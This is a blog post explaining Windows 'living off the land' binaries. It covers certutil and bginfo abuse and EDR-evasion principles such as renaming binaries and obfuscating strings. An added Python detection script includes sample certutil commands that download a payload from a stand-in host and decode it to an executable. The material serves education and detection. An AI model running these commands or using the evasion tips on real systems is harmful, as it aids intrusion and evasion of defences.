
LOLBAS - Living off the land

LOLBAS!? WTF!?

LOLBAS stands for ‘Living Off the Land Binaries and Scripts’. WTF stands for What the…well y’know. ;)

Essentially, this is the concept of attackers repurposing legitimate Microsoft-signed applications/binaries to download or execute malicious scripts without leaving a file behind, eventually achieving strategic goals such as privilege escalation, lateral movement, persistence, and C2 communication. This is still an effective way to evade AV & EDR detection, and many blue teams still struggle with baselining the usage of these binaries within their own environment.

Another project, GTFOBins, catalogues the equivalent binaries for ‘nix environments.

Attack vector

According to the LOLBAS GitHub, these LOLBins can be used to:

  • execute code
  • download/upload files
  • compile code
  • bypass UAC
  • get creds / dump process memory
  • surveillance (keylogger, network trace)
  • evade logging/remove log entry
  • side-loading/hijacking of DLL
  • pass-through execution of other programs, script (via a LOLBin)
  • pass-through persistence utilizing existing LOLBin
  • persistence (Hide data in ADS, execute at logon etc)

Example?

  • For example, bginfo.exe is a legit binary that usually displays host info on your desktop. However, it can also be used to invoke a script that launches a payload.
  • Certutil.exe is another fun one - its intended use is to dump and display CA configuration info and verify certs. However, an attacker can use it to bypass whitelisting and download/write data to the filesystem. It supports encoding/decoding stuff as well!

Often, several of these can be chained to achieve persistence and go undetected.
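As an added example (not from the original post or the LOLBAS project), here is a small Python triage over constructed process-creation events that flags the two LOLBins named above when their command lines look like download/decode use (certutil) or a remote config being loaded (bginfo). The event fields, sample command lines and patterns are assumptions for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/payload.txt C:\Users\Public\a.txt"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\a.txt C:\Users\Public\a.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"certutil.exe -verify server.cer"},  # legitimate cert work, should not fire
    {"image": r"C:\Tools\Bginfo.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"Bginfo.exe \\fileserver.example.invalid\share\config.bgi /popup /nolicprompt"},
    {"image": r"C:\Tools\Bginfo.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"Bginfo.exe C:\Tools\it-standard.bgi /timer:0"},  # local config, should not fire
]

# (process name, command-line pattern, reason). Patterns are assumed detection heuristics:
# certutil switches that fetch or transform data rather than manage certificates, and
# bginfo pointed at a .bgi config on a UNC share or URL instead of a local file.
RULES = [
    ("certutil.exe", re.compile(r"-(urlcache|decode|encode|decodehex)\b", re.I),
     "certutil used for download or encode/decode"),
    ("bginfo.exe", re.compile(r"(\\\\\S+|https?://\S+)\.bgi\b", re.I),
     "bginfo loading a remote .bgi config"),
]

def image_name(path):
    """Return the lower-cased file name from a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Return (process, reason, parent, cmdline) for each event matching a rule."""
    hits = []
    for ev in events:
        name = image_name(ev["image"])
        for proc, pattern, reason in RULES:
            if name == proc and pattern.search(ev["cmdline"]):
                hits.append((name, reason, image_name(ev["parent"]), ev["cmdline"]))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

The parent image is carried along so that a team can baseline which parents legitimately spawn these binaries and tune the rules accordingly.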

Bypassing Applocker / AMSI / Defender / EDR Agent

  • So how does it do this? Microsoft and many of these EDR vendors have some sort of “reputation” score… Since the binary itself is signed by Microsoft…it must be good…and therefore, it goes unchallenged.

Usually, a lot of these EDR tools will use the concept of “whitelisting” applications. If you execute something on that whitelist, and it passes the reputational scoring, it will let you go through!

What other ways can be used to get around it? These are some of the principles to follow:

  • Change all the defaults - change up variables, recompile the binaries, rename the binaries, obfuscate strings
  • Write your own - look at the source code; can you import the library and do similar things? Write different functions that do essentially the same thing.
  • Live off the land - abuse the trust controls placed on existing system utilities

Detections?

I am getting sleepy… so I will write another blog on how to detect LOLBAS execution tomorrow. Check back later! :)

Resources:

Acknowledgement:

  • Thank you Oddvar Moe @api0cradle for maintaining the LOLBAS project.
  • Matt Graeber @mattifestation for coining the term, and for some really amazing work in this field!